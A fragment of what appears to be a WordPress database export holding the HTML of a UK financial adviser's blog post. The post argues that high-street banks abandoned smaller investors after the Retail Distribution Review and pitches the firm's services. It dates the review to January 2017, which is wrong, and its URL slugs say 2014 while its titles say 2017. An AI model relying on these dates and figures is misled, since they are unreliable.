fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a href=\"../our-blog/\">Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678 fusion-dropdown-submenu\"><a href=\"../resources/\">Resources</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"../contact-us/\">Contact</a></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</div>&#13;\n</div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Has Your Bank Left You Stranded Without a Financial Adviser										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/wealth-management/\" title=\"Wealth Management\">Wealth Management</a></li><li>Has Your Bank Left You Stranded Without a Financial Adviser</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n										<div id=\"post-7585\" class=\"post-7585 post type-post status-publish format-standard has-post-thumbnail hentry category-wealth-management post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Has Your Bank Left You Stranded Without a Financial Adviser</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\">&#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h1><b/></h1>&#13;\n<h1>HAS YOUR BANK LEFT YOU STRANDED WITHOUT A FINANCIAL ADVISER</h1>&#13;\n<p><span style=\"font-size: 1.17em; line-height: 1.5em;\">By : Strategic Development Director</span></p>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<p><i>Banks pull out of mass market investment advice </i></p>&#13;\n<p><i> </i><i>Millions left without financial advice</i></p>&#13;\n<p><i style=\"line-height: 1.5em;\">Investors orphaned by high street banks</i></p>&#13;\n<p>The recent headlines have told a graphic story. The high street banks have retreated en masse from giving investment advice, leaving thousands – if not millions – of investors high and dry. </p>&#13;\n<p/>&#13;\n<p><span style=\"font-size: 14px; line-height: 1.5em;\">We may have sold you the product, say the banks, but if you want advice now – or if you want to discuss your long term financial planning – then sorry, we’re not interested any more.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Hang on, you reply, the banks were falling over themselves to give financial advice, to encourage you to invest. They can’t just abandon everyone they persuaded to make investments.</span></p>&#13;\n<p>Oh yes they can. And they have.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">The reason is the Retail Distribution Review – RDR as it is more commonly known. RDR was introduced in January 2017. The aim was simple: to make financial advice more transparent and easier for the consumer to understand – and to end the reliance on commission as a way of getting paid. In future advisers would be more professional, and they’d be paid by fees.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">For the banks, this presented a problem: in the past they’d relied heavily on commissions, with advisers constantly under pressure to meet sales targets.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Lloyds’ reaction to RDR was typical. They decided that following RDR investors with less than £100,000 would be unlikely to seek financial advice on a fee basis. </span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">They therefore opted to get rid of a thousand financial advisers, and concentrate their attention on investors with in excess of £100,000 – leaving everyone else to the mercies of a non-advised or severely restricted service through Halifax, Bank of Scotland and the Lloyds branch network. </span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">The other high street banks took much the same line.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">So if you’ve anything over £100,000 to invest, you’re fine. The bank manager is still your best friend. In fact, head office </span><i style=\"line-height: 1.5em;\">insists</i><span style=\"line-height: 1.5em;\"> that he’s your best friend.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">For the rest of us, the picture is rather less rosy. Suddenly the banks – those friendly people who were so eager to make you an appointment with the investment adviser – don’t want to know you any more.</span></p>&#13;\n<p>Independent Financial Advisers have long taken issue with the advice given by the banks and the unsuitable products that were sold. Significantly</p>&#13;\n<p>65% of all complaints to the Financial Ombudsman Service in 2017 were complaints against the banks.</p>&#13;\n<p>1% of complaints were against IFAs.</p>&#13;\n<p>Now it seems that IFAs must step into the breach and provide advice to savers and investors abandoned by the banks.</p>&#13;\n<p><span style=\"line-height: 1.5em;\">Well, that’s fine by us.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">If you’ve been left high and dry by your bank we’re happy to talk to you. We’re happy to offer advice and we’re more than willing to work with you over the long term to help you achieve your financial planning goals. Just because you don’t meet then banks’ criteria it doesn’t mean you don’t need financial planning advice or regular reviews of your investments.</span></p>&#13;\n<p>Next Steps</p>&#13;\n<p>It couldn’t be simpler just click on the “Get Your Free Report” button to get started<span style=\"line-height: 1.5em;\"> and discover how our highly personalised approach to your family protection can make the difference you need.</span></p>&#13;\n<p><span style=\"line-height: 1.5em;\">Warmest regards</span></p>&#13;\n<p>Sam</p>&#13;\n<p>Equity SMART</p>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n		</div> &#13;\n	</div> &#13;\n</div><div class=\"wpb_row vc_row-fluid\">&#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<p> [vc_twitter tweets_count=\"1\" el_position=\"first\"] [vc_twitter tweets_count=\"1\"] [vc_twitter tweets_count=\"1\" el_position=\"last\"] </p>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n		</div> &#13;\n	</div> &#13;\n</div>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/wealth-management/\" title=\"View all posts in Wealth Management\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><span>Comments Off</span>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/bank-left-stranded-without-financial-adviser/&amp;p[title]=Has%20Your%20Bank%20Left%20You%20Stranded%20Without%20a%20Financial%20Adviser\" target=\"_blank\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Has+Your+Bank+Left+You+Stranded+Without+a+Financial+Adviser%20http://www.equalitywalk.org.uk/bank-left-stranded-without-financial-adviser/\" target=\"_blank\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/bank-left-stranded-without-financial-adviser/&amp;title=Has%20Your%20Bank%20Left%20You%20Stranded%20Without%20a%20Financial%20Adviser\" target=\"_blank\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/bank-left-stranded-without-financial-adviser/&amp;title=Has%20Your%20Bank%20Left%20You%20Stranded%20Without%20a%20Financial%20Adviser\" target=\"_blank\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fbank-left-stranded-without-financial-adviser%2F&amp;name=Has+Your+Bank+Left+You+Stranded+Without+a+Financial+Adviser&amp;description=The+recent+headlines+have+told+a+graphic+story.+The+high+street+banks+have+retreated+en+masse+from+giving+investment+advice%2C+leaving+thousands+%E2%80%93+if+not+millions+%E2%80%93+of+investors+high+and+dry...+\" target=\"_blank\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/bank-left-stranded-without-financial-adviser/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Has Your Bank Left You Stranded Without a Financial Adviser&amp;body=http://www.equalitywalk.org.uk/bank-left-stranded-without-financial-adviser/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are closed. -->&#13;\n		<p class=\"no-comments\">Comments are closed.</p>&#13;\n&#13;\n	&#13;\n&#13;\n								</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"display:none\">&#13;\n	<div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>subscribers who get new content from us on a monthly basis</center><br/><a href=\"https://my.leadpages.net/leadbox/1449111f3f72a2%3A125d9572eb46dc/5763711893504000/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"/><script type=\"text/javascript\" src=\"../leadbox-694.js\"/></div>&#13;\n		</div><div id=\"recent_works-widget-2\" class=\"widget recent_works\"><div class=\"heading\"><p>New Guides</p></div>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		</div><div id=\"pyre_tabs-widget-2\" class=\"widget pyre_tabs\">		<div class=\"tab-holder\">&#13;\n			<div class=\"tab-hold tabs-wrapper\">&#13;\n				<ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab-popular\">Popular</a></li>&#13;\n															<li><a href=\"#tab-recent\">Recent</a></li>&#13;\n														</ul><div class=\"tab-box tabs-container\">&#13;\n										<div id=\"tab-popular\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../can-i-sell-my-pension-under-55/\">Can I sell my Pension under 55?</a>&#13;\n									<div class=\"meta\">&#13;\n										October 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../best-annuity-rates/\">&#13;\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\n									<div class=\"meta\">&#13;\n										March 21st, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\n									<div class=\"meta\">&#13;\n										September 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										September 18th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n									<div class=\"meta\">&#13;\n										September 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n															<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">&#13;\n												<ul class=\"news-list\"><li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n									<div class=\"meta\">&#13;\n										May 14th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../get-auto-enrolment/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n									<div class=\"meta\">&#13;\n										May 12th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										May 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n									<div class=\"meta\">&#13;\n										April 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../april-2014-stock-market-bulletin/\">April 2017 Stock Market Bulletin</a>&#13;\n									<div class=\"meta\">&#13;\n										April 2nd, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (3)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (7)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (16)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div><div id=\"text-23\" class=\"widget widget_text\">			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>&#13;\n		</div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-4\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"../new-individual-savings-accounts/\">The New Individual Savings Accounts</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../get-auto-enrolment/\">How To Get The Most From Auto-Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../may-2014-stock-market-bulletin/\">May 2017 Stock Market Bulletin</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../bank-left-stranded-without-financial-adviser/\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download FREE Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"../w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"../leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article></section></div>&#13;\n	</footer><footer id=\"footer\"/></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/><script type=\"text/javascript\" src=\"../scripts.hellobar.com/565e6e29d8b6bfca77549154aee8b14f23536824.js\"/></body>','&#13;\n	Has Your Bank Left You Stranded Without a Financial Adviser','Has your Financial Adviser disappeared or can no longer help you, you\'re not alone. Learn more about we can help you with our independent financial advice','publish','closed','closed','','has-your-bank-left-you-stranded-without-a-financial-adviser','','','2017-09-21 16:34:27','2017-09-21 16:34:27','',0,'http://www.equalitywalk.org.uk/has-your-bank-left-you-stranded-without-a-financial-adviser',0,'page','',0),(54,1,'2017-09-21 16:34:27','2017-09-21 16:34:27','<body class=\"single single-post postid-2325 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header 